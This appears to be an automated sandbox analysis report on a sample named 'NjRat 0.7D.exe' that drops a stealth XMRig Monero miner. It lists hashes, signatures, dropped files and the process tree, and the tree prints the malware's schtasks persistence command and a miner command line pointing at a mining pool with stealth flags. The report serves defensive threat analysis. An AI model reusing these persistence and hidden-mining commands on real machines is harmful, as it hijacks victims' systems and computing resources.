Overview

overview

10

Static

static

3

Njrat/NjRat 0.7D.exe

windows7-x64

10

Njrat/NjRat 0.7D.exe

windows10-1703-x64

10

Njrat/NjRat 0.7D.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    52s
  • max time network
    59s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/10/2023, 12:37

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Njrat/NjRat 0.7D.exe

  • Size

    2.2MB

  • MD5

    27e353481e08ead38d3f5dd7a4042d01

  • SHA1

    61f6691539aa0201f69a61f2d6b4328c47856ef9

  • SHA256

    0e6a282cdeaf4ec1222b7223a01935f686a7891b36c35b4f6a69fe6a6a1db260

  • SHA512

    ac4ae70b6c5e307bcf535f981132fef00b3182be9c272413c510b16b6a95540595925f53b698e3640200a8b681033e15a117d72b2145e2d3a835bef5154ac9cd

  • SSDEEP

    49152:MP0OMxYLKA67mRRxMQSL/neZW9F8saXeAx5vAoNhaPsQ+Quc393:wMxYLK+RRCQSL/V9FqXeIF2qDct

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 14 IoCs
    miner
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Njrat\NjRat 0.7D.exe
    "C:\Users\Admin\AppData\Local\Temp\Njrat\NjRat 0.7D.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3452
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:4564
    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2⤵
      • Executes dropped EXE
      PID:2872
    • C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4480
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1588
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:4784
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7158719 --pass=durker --cpu-max-threads-hint=70 --donate-level=5 --unam-idle-wait=1 --unam-idle-cpu=90 --unam-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2148

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Services.exe
          Filesize

          2.2MB

          MD5

          27e353481e08ead38d3f5dd7a4042d01

          SHA1

          61f6691539aa0201f69a61f2d6b4328c47856ef9

          SHA256

          0e6a282cdeaf4ec1222b7223a01935f686a7891b36c35b4f6a69fe6a6a1db260

          SHA512

          ac4ae70b6c5e307bcf535f981132fef00b3182be9c272413c510b16b6a95540595925f53b698e3640200a8b681033e15a117d72b2145e2d3a835bef5154ac9cd

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Services.exe
          Filesize

          2.2MB

          MD5

          27e353481e08ead38d3f5dd7a4042d01

          SHA1

          61f6691539aa0201f69a61f2d6b4328c47856ef9

          SHA256

          0e6a282cdeaf4ec1222b7223a01935f686a7891b36c35b4f6a69fe6a6a1db260

          SHA512

          ac4ae70b6c5e307bcf535f981132fef00b3182be9c272413c510b16b6a95540595925f53b698e3640200a8b681033e15a117d72b2145e2d3a835bef5154ac9cd

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Services.exe
          Filesize

          2.2MB

          MD5

          27e353481e08ead38d3f5dd7a4042d01

          SHA1

          61f6691539aa0201f69a61f2d6b4328c47856ef9

          SHA256

          0e6a282cdeaf4ec1222b7223a01935f686a7891b36c35b4f6a69fe6a6a1db260

          SHA512

          ac4ae70b6c5e307bcf535f981132fef00b3182be9c272413c510b16b6a95540595925f53b698e3640200a8b681033e15a117d72b2145e2d3a835bef5154ac9cd

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
          Filesize

          14KB

          MD5

          0c0195c48b6b8582fa6f6373032118da

          SHA1

          d25340ae8e92a6d29f599fef426a2bc1b5217299

          SHA256

          11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

          SHA512

          ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          Filesize

          7KB

          MD5

          80e7965f9c926d3c71cad7ab3157bb2f

          SHA1

          7d38ac1c0030af7fb5ee708f7343002b3b8650bd

          SHA256

          fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

          SHA512

          29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          Filesize

          7KB

          MD5

          80e7965f9c926d3c71cad7ab3157bb2f

          SHA1

          7d38ac1c0030af7fb5ee708f7343002b3b8650bd

          SHA256

          fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

          SHA512

          29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          Filesize

          7KB

          MD5

          80e7965f9c926d3c71cad7ab3157bb2f

          SHA1

          7d38ac1c0030af7fb5ee708f7343002b3b8650bd

          SHA256

          fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

          SHA512

          29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          Filesize

          7KB

          MD5

          80e7965f9c926d3c71cad7ab3157bb2f

          SHA1

          7d38ac1c0030af7fb5ee708f7343002b3b8650bd

          SHA256

          fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

          SHA512

          29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          Filesize

          7KB

          MD5

          80e7965f9c926d3c71cad7ab3157bb2f

          SHA1

          7d38ac1c0030af7fb5ee708f7343002b3b8650bd

          SHA256

          fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

          SHA512

          29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

          Download Submit

        • memory/2148-73-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-62-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-67-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-66-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-65-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-64-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-63-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-68-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-70-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-57-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-69-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-61-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-60-0x0000000002640000-0x0000000002654000-memory.dmp

          Filesize

          80KB

          Download

        • memory/2148-59-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2148-55-0x0000000140000000-0x000000014074D000-memory.dmp

          Filesize

          7.3MB

          Download

        • memory/2872-30-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2872-35-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2872-25-0x00000000006B0000-0x00000000006B6000-memory.dmp

          Filesize

          24KB

          Download

        • memory/2872-31-0x000000001C490000-0x000000001C4A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3452-3-0x000000001C950000-0x000000001C960000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3452-32-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3452-0-0x0000000000B70000-0x0000000000D9E000-memory.dmp

          Filesize

          2.2MB

          Download

        • memory/3452-1-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4480-46-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4480-34-0x000000001D020000-0x000000001D032000-memory.dmp

          Filesize

          72KB

          Download

        • memory/4480-33-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4480-54-0x000000001D0E0000-0x000000001D0EE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/4480-58-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4784-52-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4784-53-0x000000001C460000-0x000000001C470000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4784-71-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4784-72-0x000000001C460000-0x000000001C470000-memory.dmp

          Filesize

          64KB

          Download